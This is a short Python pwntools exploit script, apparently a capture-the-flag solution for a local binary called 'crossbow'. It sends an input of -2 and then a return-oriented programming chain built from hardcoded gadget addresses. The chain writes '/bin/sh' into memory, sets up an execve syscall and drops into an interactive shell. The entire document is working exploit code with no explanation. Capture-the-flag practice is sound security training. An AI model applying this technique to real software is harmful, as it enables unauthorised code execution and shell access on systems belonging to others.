#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./crossbow", checksec=False)
r = process()

# funcs
s = lambda a: r.sendlineafter(b": ", a)
ss = lambda a: r.sendlineafter(b"> ", a)

# gadgets
pop_rax = 0x401001
pop_rdi = 0x401d6c
pop_rsi = 0x40566b
pop_rdx = 0x401139
syscall = 0x4015d3
mov_rax_rdi = 0x4020f5

# buf
buf = b"JUNK"*2
buf += p64(pop_rax)
buf += b"/bin/sh\0"
buf += p64(pop_rdi)
buf += p64(0x40d500)
buf += p64(mov_rax_rdi)
buf += p64(pop_rax)
buf += p64(59)
buf += p64(pop_rsi)
buf += p64(0)
buf += p64(pop_rdx)
buf += p64(0)
buf += p64(syscall)
s(b"-2")
ss(buf)

r.interactive()